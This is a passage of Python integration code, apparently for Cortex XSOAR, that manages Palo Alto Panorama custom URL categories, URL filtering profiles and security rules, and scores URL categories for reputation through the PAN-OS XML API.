URL,\n 'POST',\n body=params,\n )\n\n custom_url_category_output: Dict[str, Any] = {'Name': custom_url_category_name}\n if DEVICE_GROUP:\n custom_url_category_output['DeviceGroup'] = DEVICE_GROUP\n if description:\n custom_url_category_output['Description'] = description\n if type_:\n custom_url_category_output['Type'] = type_\n if sites:\n custom_url_category_output['Sites'] = sites\n else:\n custom_url_category_output['Categories'] = categories\n return result, custom_url_category_output\n\n\ndef panorama_create_custom_url_category_command(args: dict):\n \"\"\"\n Create a custom URL category\n \"\"\"\n custom_url_category_name = args['name']\n type_ = args['type'] if 'type' in args else None\n sites = argToList(args['sites']) if 'sites' in args else None\n categories = argToList(args['categories']) if 'categories' in args else None\n description = args.get('description')\n\n custom_url_category, custom_url_category_output = panorama_create_custom_url_category(custom_url_category_name,\n type_, sites, categories,\n description)\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': custom_url_category,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Created Custom URL Category:', custom_url_category_output,\n ['Name', 'Type', 'Categories', 'Sites', 'Description'], removeNull=True),\n 'EntryContext': {\n \"Panorama.CustomURLCategory(val.Name == obj.Name)\": custom_url_category_output\n }\n })\n\n\n@logger\ndef panorama_delete_custom_url_category(custom_url_category_name: str):\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"profiles/custom-url-category/entry[@name='\" + custom_url_category_name + \"']\",\n 'element': \"\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_delete_custom_url_category_command(custom_url_category_name: str):\n \"\"\"\n Delete a custom url category\n \"\"\"\n\n result = panorama_delete_custom_url_category(custom_url_category_name)\n custom_url_category_output = {'Name': custom_url_category_name}\n if DEVICE_GROUP:\n custom_url_category_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Custom URL category was deleted successfully.',\n 'EntryContext': {\n \"Panorama.CustomURLCategory(val.Name == obj.Name)\": custom_url_category_output\n }\n })\n\n\n@logger\ndef panorama_edit_custom_url_category(custom_url_category_name: str, type_: str, items: list,\n description: Optional[str] = None):\n major_version = get_pan_os_major_version()\n description_element = add_argument(description, 'description', False)\n items_element = add_argument_list(items, 'list', True)\n\n if major_version <= 8:\n if type_ == 'Category Match':\n raise Exception('The Categories argument is only relevant for PAN-OS 9.x versions.')\n element = f\"{description_element}{items_element}\"\n else:\n type_element = add_argument(type_, 'type', False)\n element = f\"{description_element}{items_element}{type_element}\"\n\n params = {\n 'action': 'edit',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"profiles/custom-url-category/entry[@name='\" + custom_url_category_name + \"']\",\n 'element': element,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n custom_url_category_output: Dict[str, Any] = {'Name': custom_url_category_name,\n 'Type': type_}\n if DEVICE_GROUP:\n custom_url_category_output['DeviceGroup'] = DEVICE_GROUP\n if description:\n custom_url_category_output['Description'] = description\n if type_ == 'Category Match':\n custom_url_category_output['Categories'] = items\n else:\n custom_url_category_output['Sites'] = items\n\n return result, custom_url_category_output\n\n\ndef panorama_custom_url_category_add_items(custom_url_category_name: str, items: list, type_: str):\n \"\"\"\n Add sites or categories to a configured custom url category\n \"\"\"\n custom_url_category = panorama_get_custom_url_category(custom_url_category_name)\n if '@dirtyId' in custom_url_category:\n LOG(f'Found uncommitted item:\\n{custom_url_category}')\n raise Exception('Please commit the instance prior to editing the Custom URL Category.')\n description = custom_url_category.get('description')\n\n custom_url_category_items: List[str] = []\n if 'list' in custom_url_category:\n if custom_url_category['list']:\n custom_url_category_items = argToList(custom_url_category['list']['member'])\n\n merged_items = list((set(items)).union(set(custom_url_category_items)))\n\n result, custom_url_category_output = panorama_edit_custom_url_category(custom_url_category_name, type_,\n merged_items, description)\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Updated Custom URL Category:', custom_url_category_output,\n ['Name', 'Type', 'Categories', 'Sites', 'Description'], removeNull=True),\n 'EntryContext': {\n \"Panorama.CustomURLCategory(val.Name == obj.Name)\": custom_url_category_output\n }\n })\n\n\ndef panorama_custom_url_category_remove_items(custom_url_category_name: str, items: list, type_: str):\n \"\"\"\n Add sites or categories to a configured custom url category\n \"\"\"\n custom_url_category = panorama_get_custom_url_category(custom_url_category_name)\n if '@dirtyId' in custom_url_category:\n LOG(f'Found uncommitted item:\\n{custom_url_category}')\n raise Exception('Please commit the instance prior to editing the Custom URL Category.')\n description = custom_url_category.get('description')\n\n if 'list' in custom_url_category:\n if 'member' in custom_url_category['list']:\n custom_url_category_items = custom_url_category['list']['member']\n if not custom_url_category_items:\n raise Exception('Custom url category does not contain sites or categories.')\n\n subtracted_items = [item for item in custom_url_category_items if item not in items]\n result, custom_url_category_output = panorama_edit_custom_url_category(custom_url_category_name, type_,\n subtracted_items, description)\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Updated Custom URL Category:', custom_url_category_output,\n ['Name', 'Categories', 'Sites', 'Description'], removeNull=True),\n 'EntryContext': {\n \"Panorama.CustomURLCategory(val.Name == obj.Name)\": custom_url_category_output\n }\n })\n\n\ndef panorama_edit_custom_url_category_command(args: dict):\n custom_url_category_name = args['name']\n items = argToList(args['sites']) if 'sites' in args else argToList(args['categories'])\n type_ = \"URL List\" if 'sites' in args else \"Category Match\"\n if args['action'] == 'remove':\n panorama_custom_url_category_remove_items(custom_url_category_name, items, type_)\n else:\n panorama_custom_url_category_add_items(custom_url_category_name, items, type_)\n\n\n''' URL Filtering '''\n\n\n@logger\ndef panorama_get_url_category(url_cmd: str, url: str):\n params = {\n 'action': 'show',\n 'type': 'op',\n 'key': API_KEY,\n 'cmd': f'<{url_cmd}>{url}'\n }\n raw_result = http_request(\n URL,\n 'POST',\n body=params,\n )\n result = raw_result['response']['result']\n if 'Failed to query the cloud' in result:\n raise Exception('Failed to query the cloud. Please check your URL Filtering license.')\n\n if url_cmd == 'url-info-host':\n # The result in this case looks like so: \"Ancestors info:\\nBM:\\nURL.com,1,5,search-engines,, {some more info\n # here...}\" - The 4th element is the url category.\n category = result.split(',')[3]\n else:\n result = result.splitlines()[1]\n if url_cmd == 'url':\n category = result.split(' ')[1]\n else: # url-info-cloud\n category = result.split(',')[3]\n return category\n\n\ndef populate_url_filter_category_from_context(category: str):\n url_filter_category = demisto.dt(demisto.context(), f'Panorama.URLFilter(val.Category === \"{category}\")')\n if not url_filter_category:\n return []\n\n if type(url_filter_category) is list:\n return url_filter_category[0].get(\"URL\")\n else: # url_filter_category is a dict\n context_urls = url_filter_category.get(\"URL\", None) # pylint: disable=no-member\n if type(context_urls) is str:\n return [context_urls]\n else:\n return context_urls\n\n\ndef calculate_dbot_score(category: str, additional_suspicious: list, additional_malicious: list):\n \"\"\"translate a category to a dbot score. For more information:\n https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000Cm5hCAC\n\n Args:\n category: the URL category from URLFiltering\n\n Returns:\n dbot score.\n \"\"\"\n predefined_suspicious = ['high-risk', 'medium-risk', 'hacking', 'proxy-avoidance-and-anonymizers', 'grayware',\n 'not-resolved']\n suspicious_categories = list((set(additional_suspicious)).union(set(predefined_suspicious)))\n\n predefined_malicious = ['phishing', 'command-and-control', 'malware']\n malicious_categories = list((set(additional_malicious)).union(set(predefined_malicious)))\n\n dbot_score = 1\n if category in malicious_categories:\n dbot_score = 3\n elif category in suspicious_categories:\n dbot_score = 2\n elif category == 'unknown':\n dbot_score = 0\n\n return dbot_score\n\n\ndef panorama_get_url_category_command(url_cmd: str, url: str, additional_suspicious: list, additional_malicious: list):\n \"\"\"\n Get the url category from Palo Alto URL Filtering\n \"\"\"\n urls = argToList(url)\n\n categories_dict: Dict[str, list] = {}\n categories_dict_hr: Dict[str, list] = {}\n command_results: List[CommandResults] = []\n for url in urls:\n category = panorama_get_url_category(url_cmd, url)\n if category in categories_dict:\n categories_dict[category].append(url)\n categories_dict_hr[category].append(url)\n else:\n categories_dict[category] = [url]\n categories_dict_hr[category] = [url]\n context_urls = populate_url_filter_category_from_context(category)\n categories_dict[category] = list((set(categories_dict[category])).union(set(context_urls)))\n\n score = calculate_dbot_score(category.lower(), additional_suspicious, additional_malicious)\n dbot_score = Common.DBotScore(\n indicator=url,\n indicator_type=DBotScoreType.URL,\n integration_name='PAN-OS',\n score=score\n )\n url_obj = Common.URL(\n url=url,\n dbot_score=dbot_score,\n category=category\n )\n command_results.append(CommandResults(\n indicator=url_obj,\n readable_output=tableToMarkdown('URL', url_obj.to_context())\n ))\n\n url_category_output_hr = []\n for key, value in categories_dict_hr.items():\n url_category_output_hr.append({\n 'Category': key,\n 'URL': value\n })\n\n url_category_output = []\n for key, value in categories_dict.items():\n url_category_output.append({\n 'Category': key,\n 'URL': value\n })\n\n title = 'URL Filtering'\n if url_cmd == 'url-info-cloud':\n title += ' from cloud'\n elif url_cmd == 'url-info-host':\n title += ' from host'\n human_readable = tableToMarkdown(f'{title}:', url_category_output_hr, ['URL', 'Category'], removeNull=True)\n\n command_results.insert(0, CommandResults(\n outputs_prefix='Panorama.URLFilter',\n outputs_key_field='Category',\n outputs=url_category_output,\n readable_output=human_readable,\n raw_response=categories_dict,\n ))\n return_results(command_results)\n\n\n''' URL Filter '''\n\n\ndef prettify_get_url_filter(url_filter: dict):\n pretty_url_filter = {'Name': url_filter['@name']}\n if DEVICE_GROUP:\n pretty_url_filter['DeviceGroup'] = DEVICE_GROUP\n if 'description' in url_filter:\n pretty_url_filter['Description'] = url_filter['description']\n\n pretty_url_filter['Category'] = []\n alert_category_list = []\n block_category_list = []\n allow_category_list = []\n continue_category_list = []\n override_category_list = []\n\n if 'alert' in url_filter:\n alert_category_list = url_filter['alert']['member']\n if 'block' in url_filter:\n block_category_list = url_filter['block']['member']\n if 'allow' in url_filter:\n allow_category_list = url_filter['allow']['member']\n if 'continue' in url_filter:\n continue_category_list = url_filter['continue']['member']\n if 'override' in url_filter:\n override_category_list = url_filter['override']['member']\n\n for category in alert_category_list:\n pretty_url_filter['Category'].append({\n 'Name': category,\n 'Action': 'alert'\n })\n for category in block_category_list:\n pretty_url_filter['Category'].append({\n 'Name': category,\n 'Action': 'block'\n })\n for category in allow_category_list:\n pretty_url_filter['Category'].append({\n 'Name': category,\n 'Action': 'block'\n })\n for category in continue_category_list:\n pretty_url_filter['Category'].append({\n 'Name': category,\n 'Action': 'block'\n })\n for category in override_category_list:\n pretty_url_filter['Category'].append({\n 'Name': category,\n 'Action': 'block'\n })\n\n if 'allow-list' in url_filter or 'block-list' in url_filter:\n pretty_url_filter['Overrides'] = []\n if 'allow-list' in url_filter:\n pretty_url_filter['OverrideAllowList'] = url_filter['allow-list']['member']\n else:\n pretty_url_filter['OverrideBlockList'] = url_filter['block-list']['member']\n return pretty_url_filter\n\n\n@logger\ndef panorama_get_url_filter(name: str):\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"profiles/url-filtering/entry[@name='\" + name + \"']\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_get_url_filter_command(name: str):\n \"\"\"\n Get a URL Filter\n \"\"\"\n\n url_filter = panorama_get_url_filter(name)\n\n url_filter_output = prettify_get_url_filter(url_filter)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': url_filter,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('URL Filter:', url_filter_output,\n ['Name', 'Category', 'OverrideAllowList', 'OverrideBlockList', 'Description'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.URLFilter(val.Name == obj.Name)\": url_filter_output\n }\n })\n\n\n@logger\ndef panorama_create_url_filter(\n url_filter_name: str, action: str,\n url_category_list: str,\n override_allow_list: Optional[str] = None,\n override_block_list: Optional[str] = None,\n description: Optional[str] = None):\n element = add_argument_list(url_category_list, action, True) + add_argument_list(override_allow_list, 'allow-list',\n True) + add_argument_list(\n override_block_list, 'block-list', True) + add_argument(description, 'description',\n False) + \"block\"\n\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"profiles/url-filtering/entry[@name='\" + url_filter_name + \"']\",\n 'element': element,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n return result\n\n\ndef panorama_create_url_filter_command(args: dict):\n \"\"\"\n Create a URL Filter\n \"\"\"\n url_filter_name = args['name']\n action = args['action']\n url_category_list = argToList(args['url_category'])\n override_allow_list = argToList(args.get('override_allow_list'))\n override_block_list = argToList(args.get('override_block_list'))\n description = args.get('description')\n\n result = panorama_create_url_filter(url_filter_name, action, url_category_list, override_allow_list,\n override_block_list, description)\n\n url_filter_output = {'Name': url_filter_name}\n if DEVICE_GROUP:\n url_filter_output['DeviceGroup'] = DEVICE_GROUP\n url_filter_output['Category'] = []\n for category in url_category_list:\n url_filter_output['Category'].append({\n 'Name': category,\n 'Action': action\n })\n if override_allow_list:\n url_filter_output['OverrideAllowList'] = override_allow_list\n if override_block_list:\n url_filter_output['OverrideBlockList'] = override_block_list\n if description:\n url_filter_output['Description'] = description\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'URL Filter was created successfully.',\n 'EntryContext': {\n \"Panorama.URLFilter(val.Name == obj.Name)\": url_filter_output\n }\n })\n\n\n@logger\ndef panorama_edit_url_filter(url_filter_name: str, element_to_change: str, element_value: str,\n add_remove_element: Optional[str] = None):\n url_filter_prev = panorama_get_url_filter(url_filter_name)\n if '@dirtyId' in url_filter_prev:\n LOG(f'Found uncommitted item:\\n{url_filter_prev}')\n raise Exception('Please commit the instance prior to editing the URL Filter.')\n\n url_filter_output: Dict[str, Any] = {'Name': url_filter_name}\n if DEVICE_GROUP:\n url_filter_output['DeviceGroup'] = DEVICE_GROUP\n params = {\n 'action': 'edit',\n 'type': 'config',\n 'key': API_KEY,\n }\n\n if element_to_change == 'description':\n params['xpath'] = XPATH_OBJECTS + f\"profiles/url-filtering/entry[@name='{url_filter_name}']/{element_to_change}\"\n params['element'] = add_argument_open(element_value, 'description', False)\n result = http_request(URL, 'POST', body=params)\n url_filter_output['Description'] = element_value\n\n elif element_to_change == 'override_allow_list':\n prev_override_allow_list = argToList(url_filter_prev['allow-list']['member'])\n if add_remove_element == 'add':\n new_override_allow_list = list((set(prev_override_allow_list)).union(set([element_value])))\n else:\n new_override_allow_list = [url for url in prev_override_allow_list if url != element_value]\n\n params['xpath'] = XPATH_OBJECTS + \"profiles/url-filtering/entry[@name='\" + url_filter_name + \"']/allow-list\"\n params['element'] = add_argument_list(new_override_allow_list, 'allow-list', True)\n result = http_request(URL, 'POST', body=params)\n url_filter_output[element_to_change] = new_override_allow_list\n\n # element_to_change == 'override_block_list'\n else:\n prev_override_block_list = argToList(url_filter_prev['block-list']['member'])\n if add_remove_element == 'add':\n new_override_block_list = list((set(prev_override_block_list)).union(set([element_value])))\n else:\n new_override_block_list = [url for url in prev_override_block_list if url != element_value]\n\n params['xpath'] = XPATH_OBJECTS + \"profiles/url-filtering/entry[@name='\" + url_filter_name + \"']/block-list\"\n params['element'] = add_argument_list(new_override_block_list, 'block-list', True)\n result = http_request(URL, 'POST', body=params)\n url_filter_output[element_to_change] = new_override_block_list\n\n return result, url_filter_output\n\n\ndef panorama_edit_url_filter_command(args: dict):\n \"\"\"\n Edit a URL Filter\n \"\"\"\n url_filter_name = args['name']\n element_to_change = args['element_to_change']\n add_remove_element = args['add_remove_element']\n element_value = args['element_value']\n\n result, url_filter_output = panorama_edit_url_filter(url_filter_name, element_to_change, element_value,\n add_remove_element)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'URL Filter was edited successfully.',\n 'EntryContext': {\n \"Panorama.URLFilter(val.Name == obj.Name)\": url_filter_output\n }\n })\n\n\n@logger\ndef panorama_delete_url_filter(url_filter_name: str):\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"profiles/url-filtering/entry[@name='\" + url_filter_name + \"']\",\n 'element': \"\",\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_delete_url_filter_command(url_filter_name: str):\n \"\"\"\n Delete a custom url category\n \"\"\"\n\n result = panorama_delete_url_filter(url_filter_name)\n\n url_filter_output = {'Name': url_filter_name}\n if DEVICE_GROUP:\n url_filter_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'URL Filter was deleted successfully.',\n 'EntryContext': {\n \"Panorama.URLFilter(val.Name == obj.Name)\": url_filter_output\n }\n })\n\n\n''' Security Rules Managing '''\n\n\ndef prettify_rule(rule: dict):\n pretty_rule = {\n 'Name': rule['@name'],\n 'Action': rule['action']\n }\n if DEVICE_GROUP:\n pretty_rule['DeviceGroup'] = DEVICE_GROUP\n if '@loc' in rule:\n pretty_rule['Location'] = rule['@loc']\n if 'category' in rule and 'member' in rule['category']:\n pretty_rule['CustomUrlCategory'] = rule['category']['member']\n if 'application' in rule and 'member' in rule['application']:\n pretty_rule['Application'] = rule['application']['member']\n if 'destination' in rule and 'member' in rule['destination']:\n pretty_rule['Destination'] = rule['destination']['member']\n if 'from' in rule and 'member' in rule['from']:\n pretty_rule['From'] = rule['from']['member']\n if 'service' in rule and 'member' in rule['service']:\n pretty_rule['Service'] = rule['service']['member']\n if 'to' in rule and 'member' in rule['to']:\n pretty_rule['To'] = rule['to']['member']\n if 'source' in rule and 'member' in rule['source']:\n pretty_rule['Source'] = rule['source']['member']\n if 'tag' in rule and 'member' in rule['tag']:\n pretty_rule['Tags'] = rule['tag']['member']\n if 'log-setting' in rule and '#text' in rule['log-setting']:\n pretty_rule['LogForwardingProfile'] = rule['log-setting']['#text']\n\n return pretty_rule\n\n\ndef prettify_rules(rules: Union[List[dict], dict]):\n if not isinstance(rules, list):\n return prettify_rule(rules)\n pretty_rules_arr = []\n for rule in rules:\n pretty_rule = prettify_rule(rule)\n pretty_rules_arr.append(pretty_rule)\n\n return pretty_rules_arr\n\n\n@logger\ndef panorama_list_rules(xpath: str, tag: str = None):\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': xpath,\n 'key': API_KEY\n }\n\n if tag:\n params[\"xpath\"] = f'{params[\"xpath\"]}[( tag/member = \\'{tag}\\')]'\n\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_list_rules_command(tag: str):\n \"\"\"\n List security rules\n \"\"\"\n if DEVICE_GROUP:\n if not PRE_POST:\n raise Exception('Please provide the pre_post argument when listing rules in Panorama instance.')\n else:\n xpath = XPATH_SECURITY_RULES + PRE_POST + '/security/rules/entry'\n else:\n xpath = XPATH_SECURITY_RULES\n\n rules = panorama_list_rules(xpath, tag)\n pretty_rules = prettify_rules(rules)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': rules,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Security Rules:', pretty_rules,\n ['Name', 'Location', 'Action', 'From', 'To',\n 'CustomUrlCategory', 'Service', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.SecurityRule(val.Name == obj.Name)\": pretty_rules\n }\n })\n\n\n@logger\ndef panorama_move_rule_command(args: dict):\n \"\"\"\n Move a security rule\n \"\"\"\n rulename = args['rulename']\n params = {\n 'type': 'config',\n 'action': 'move',\n 'key': API_KEY,\n 'where': args['where'],\n }\n\n if DEVICE_GROUP:\n if not PRE_POST:\n raise Exception('Please provide the pre_post argument when moving a rule in Panorama instance.')\n else:\n params['xpath'] = XPATH_SECURITY_RULES + PRE_POST + '/security/rules/entry' + '[@name=\\'' + rulename + '\\']'\n else:\n params['xpath'] = XPATH_SECURITY_RULES + '[@name=\\'' + rulename + '\\']'\n\n if 'dst' in args:\n params['dst'] = args['dst']\n\n result = http_request(URL, 'POST', body=params)\n rule_output = {'Name': rulename}\n if DEVICE_GROUP:\n rule_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Rule ' + rulename + ' moved successfully.',\n 'EntryContext': {\n \"Panorama.SecurityRule(val.Name == obj.Name)\": rule_output\n }\n })\n\n\n''' Security Rule Configuration '''\n\n\n@logger\ndef panorama_create_rule_command(args: dict):\n \"\"\"\n Create a security rule\n \"\"\"\n rulename = args['rulename'] if 'rulename' in args else ('demisto-' + (str(uuid.uuid4()))[:8])\n source = argToList(args.get('source'))\n destination = argToList(args.get('destination'))\n source_zone = argToList(args.get('source_zone'))\n destination_zone = argToList(args.get('destination_zone'))\n negate_source = args.get('negate_source')\n negate_destination = args.get('negate_destination')\n action = args.get('action')\n service = args.get('service')\n disable = args.get('disable')\n categories = argToList(args.get('category'))\n application = argToList(args.get('application'))\n source_user = args.get('source_user')\n disable_server_response_inspection = args.get('disable_server_response_inspection')\n description = args.get('description')\n target = args.get('target')\n log_forwarding = args.get('log_forwarding', None)\n tags = argToList(args['tags']) if 'tags' in args else None\n profile_setting = args.get('profile_setting')\n\n if not DEVICE_GROUP:\n if target:\n raise Exception('The target argument is relevant only for a Palo Alto Panorama instance.')\n elif log_forwarding:\n raise Exception('The log_forwarding argument is relevant only for a Palo Alto Panorama instance.')\n\n params = prepare_security_rule_params(api_action='set', rulename=rulename, source=source, destination=destination,\n negate_source=negate_source, negate_destination=negate_destination,\n action=action, service=service,\n disable=disable, application=application, source_user=source_user,\n disable_server_response_inspection=disable_server_response_inspection,\n description=description, target=target,\n log_forwarding=log_forwarding, tags=tags, category=categories,\n from_=source_zone, to=destination_zone, profile_setting=profile_setting)\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n rule_output = {SECURITY_RULE_ARGS[key]: value for key, value in args.items() if key in SECURITY_RULE_ARGS}\n rule_output['Name'] = rulename\n if DEVICE_GROUP:\n rule_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Rule configured successfully.',\n 'EntryContext': {\n \"Panorama.SecurityRule(val.Name == obj.Name)\": rule_output\n }\n })\n\n\n@logger\ndef panorama_get_current_element(element_to_change: str, xpath: str) -> list:\n \"\"\"\n Get the current element value from\n \"\"\"\n params = {\n 'type': 'config',\n 'action': 'get',\n 'xpath': xpath,\n 'key': API_KEY\n }\n try:\n response = http_request(URL, 'GET', params=params)\n except PAN_OS_Not_Found:\n return []\n\n result = response.get('response').get('result')\n if '@dirtyId' in result:\n LOG(f'Found uncommitted item:\\n{result}')\n raise Exception('Please commit the instance prior to editing the Security rule.')\n current_object = result.get(element_to_change)\n if 'list' in current_object:\n current_objects_items = argToList(current_object['list']['member'])\n elif 'member' in current_object:\n current_objects_items = argToList(current_object.get('member'))\n\n return current_objects_items\n\n\n@logger\ndef panorama_edit_rule_items(rulename: str, element_to_change: str, element_value: List[str], behaviour: str):\n listable_elements = ['source', 'destination', 'application', 'category', 'source-user', 'service', 'tag']\n if element_to_change not in listable_elements:\n raise Exception(f'Adding objects is only available for the following Objects types:{listable_elements}')\n if element_to_change == 'target' and not DEVICE_GROUP:\n raise Exception('The target argument is relevant only for a Palo Alto Panorama instance.')\n\n params = {\n 'type': 'config',\n 'action': 'edit',\n 'key': API_KEY\n }\n\n if DEVICE_GROUP:\n if not PRE_POST:\n raise Exception('please provide the pre_post argument when editing a rule in Panorama instance.')\n else:\n params['xpath'] = XPATH_SECURITY_RULES + PRE_POST + '/security/rules/entry' + '[@name=\\'' + rulename + '\\']'\n else:\n params['xpath'] = XPATH_SECURITY_RULES + '[@name=\\'' + rulename + '\\']'\n params[\"xpath\"] = f'{params[\"xpath\"]}/' + element_to_change\n\n current_objects_items = panorama_get_current_element(element_to_change, params['xpath'])\n if behaviour == 'add':\n values = list((set(current_objects_items)).union(set(element_value)))\n else: # remove\n values = [item for item in current_objects_items if item not in element_value]\n if not values:\n raise Exception(f'The object: {element_to_change} must have at least one item.')\n\n params['element'] = add_argument_list(values, element_to_change, True)\n result = http_request(URL, 'POST', body=params)\n rule_output = {\n 'Name': rulename,\n SECURITY_RULE_ARGS[element_to_change]: values\n }\n if DEVICE_GROUP:\n rule_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Rule edited successfully.',\n 'EntryContext': {\n \"Panorama.SecurityRule(val.Name == obj.Name)\": rule_output\n }\n })\n\n\n@logger\ndef panorama_edit_rule_command(args: dict):\n \"\"\"\n Edit a security rule\n \"\"\"\n rulename = args['rulename']\n element_to_change = args['element_to_change']\n if element_to_change == 'log-forwarding':\n element_to_change = 'log-setting'\n element_value = args['element_value']\n\n if element_to_change == 'target' and not DEVICE_GROUP:\n raise Exception('The target argument is relevant only for a Palo Alto Panorama instance.')\n\n behaviour = args.get('behaviour') if 'behaviour' in args else 'replace'\n if behaviour != 'replace':\n panorama_edit_rule_items(rulename, element_to_change, argToList(element_value), behaviour)\n else:\n params = {\n 'type': 'config',\n 'action': 'edit',\n 'key': API_KEY\n }\n\n if element_to_change in ['action', 'description', 'log-setting']:\n params['element'] = add_argument_open(element_value, element_to_change, False)\n elif element_to_change in ['source', 'destination', 'application', 'category', 'source-user', 'service', 'tag']:\n element_value = argToList(element_value)\n params['element'] = add_argument_list(element_value, element_to_change, True)\n elif element_to_change == 'target':\n params['element'] = add_argument_target(element_value, 'target')\n elif element_to_change == 'profile-setting':\n params['element'] = add_argument_profile_setting(element_value, 'profile-setting')\n else:\n params['element'] = add_argument_yes_no(element_value, element_to_change)\n\n if DEVICE_GROUP:\n if not PRE_POST:\n raise Exception('please provide the pre_post argument when editing a rule in Panorama instance.')\n else:\n params['xpath'] = XPATH_SECURITY_RULES + PRE_POST + f'/security/rules/entry[@name=\\'{rulename}\\']'\n else:\n params['xpath'] = XPATH_SECURITY_RULES + '[@name=\\'' + rulename + '\\']'\n params['xpath'] += '/' + element_to_change\n\n result = http_request(URL, 'POST', body=params)\n\n rule_output = {\n 'Name': rulename,\n SECURITY_RULE_ARGS[element_to_change]: element_value\n }\n if DEVICE_GROUP:\n rule_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Rule edited successfully.',\n 'EntryContext': {\n \"Panorama.SecurityRule(val.Name == obj.Name)\": rule_output\n }\n })\n\n\n@logger\ndef panorama_delete_rule_command(rulename: str):\n \"\"\"\n Delete a security rule\n \"\"\"\n params = {\n 'type': 'config',\n 'action': 'delete',\n 'key': API_KEY\n }\n if DEVICE_GROUP:\n if not PRE_POST:\n raise Exception('Please provide the pre_post argument when moving a rule in Panorama instance.')\n else:\n params['xpath'] = XPATH_SECURITY_RULES + PRE_POST + '/security/rules/entry' + '[@name=\\'' + rulename + '\\']'\n else:\n params['xpath'] = XPATH_SECURITY_RULES + '[@name=\\'' + rulename + '\\']'\n\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Rule deleted successfully.',\n })\n\n\n@logger\ndef panorama_custom_block_rule_command(args: dict):\n \"\"\"\n Block an object in Panorama\n \"\"\"\n object_type = args['object_type']\n object_value = argToList(args['object_value'])\n direction = args['direction'] if 'direction' in args else 'both'\n rulename = args['rulename'] if 'rulename' in args else ('demisto-' + (str(uuid.uuid4()))[:8])\n block_destination = False if direction == 'from' else True\n block_source = False if direction == 'to' else True\n target = argToList(args.get('target')) if 'target' in args else None\n log_forwarding = args.get('log_forwarding', None)\n tags = argToList(args['tags']) if 'tags' in args else None\n\n if not DEVICE_GROUP:\n if target:\n raise Exception('The target argument is relevant only for a Palo Alto Panorama instance.')\n elif log_forwarding:\n raise Exception('The log_forwarding argument is relevant only for a Palo Alto Panorama instance.')\n\n custom_block_output = {\n 'Name': rulename,\n 'Direction': direction,\n 'Disabled': False\n }\n if DEVICE_GROUP:\n custom_block_output['DeviceGroup'] = DEVICE_GROUP\n if log_forwarding:\n custom_block_output['LogForwarding'] = log_forwarding\n if target:\n custom_block_output['Target'] = target\n if tags:\n custom_block_output['Tags'] = tags\n\n if object_type == 'ip':\n if block_source:\n params = prepare_security_rule_params(api_action='set', action='drop', source=object_value,\n destination=['any'], rulename=rulename + '-from', target=target,\n log_forwarding=log_forwarding, tags=tags)\n result = http_request(URL, 'POST', 